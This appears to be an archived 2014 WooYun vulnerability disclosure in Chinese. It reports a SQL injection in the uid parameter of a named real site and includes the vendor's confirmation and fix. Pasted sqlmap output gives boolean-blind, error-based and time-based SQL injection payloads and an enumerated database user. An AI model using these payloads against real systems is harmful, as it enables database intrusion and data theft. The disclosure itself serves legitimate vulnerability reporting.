乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-08-03: 细节已通知厂商并且等待厂商处理中 2014-08-03: 厂商已经确认,细节仅向厂商公开 2014-08-03: 厂商已经修复漏洞并主动公开,细节向公众公开
其实我也是一个PUA,你有妹子了么
注入点:
http://paoxue.com/vip/trail.php?uid=-1 (GET)
sqlmap identified the following injection points with a total of 10660 HTTP(s) requests:---Place: GETParameter: uid Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: uid=-1 RLIKE (SELECT (CASE WHEN (5516=5516) THEN 0x2d31 ELSE 0x28 END)) Type: error-based Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause Payload: uid=-8844 OR ROW(8651,6276)>(SELECT COUNT(*),CONCAT(0x7169747671,(SELECT (CASE WHEN (8651=8651) THEN 1 ELSE 0 END)),0x716c706a71,FLOOR(RAND(0)*2))x FROM (SELECT 1076 UNION SELECT 8937 UNION SELECT 5275 UNION SELECT 8627)a GROUP BY x) Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: uid=-5855 OR 8895=SLEEP(5)---web application technology: PHP 5.3.3back-end DBMS: MySQL 4.1sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: uid Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: uid=-1 RLIKE (SELECT (CASE WHEN (5516=5516) THEN 0x2d31 ELSE 0x28 END)) Type: error-based Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause Payload: uid=-8844 OR ROW(8651,6276)>(SELECT COUNT(*),CONCAT(0x7169747671,(SELECT (CASE WHEN (8651=8651) THEN 1 ELSE 0 END)),0x716c706a71,FLOOR(RAND(0)*2))x FROM (SELECT 1076 UNION SELECT 8937 UNION SELECT 5275 UNION SELECT 8627)a GROUP BY x) Type: AND/OR time-based blind Title: MySQL > 5.0.11 OR time-based blind Payload: uid=-5855 OR 8895=SLEEP(5)---web application technology: PHP 5.3.3back-end DBMS: MySQL >= 5.0.0database management system users [1]:[*] 'crm'@'%'
添加过滤
危害等级:中
漏洞Rank:8
确认时间:2014-08-03 16:07
经核实该漏洞确实存在,属于已废弃的子系统尚遗留在生产环境未做下线处理导致。因为生产环境前端已经部署WAF,实际上受影响范围有限,大部分危险查询已被拦截,所以最后折中考虑给RANK 8。 感谢您的泡学网信息安全做出的贡献,我们也会对研发团队加强安全相关的培训。 稍后有小礼物送上。
2014-08-03:已在生产环境完成下线处理。再次感谢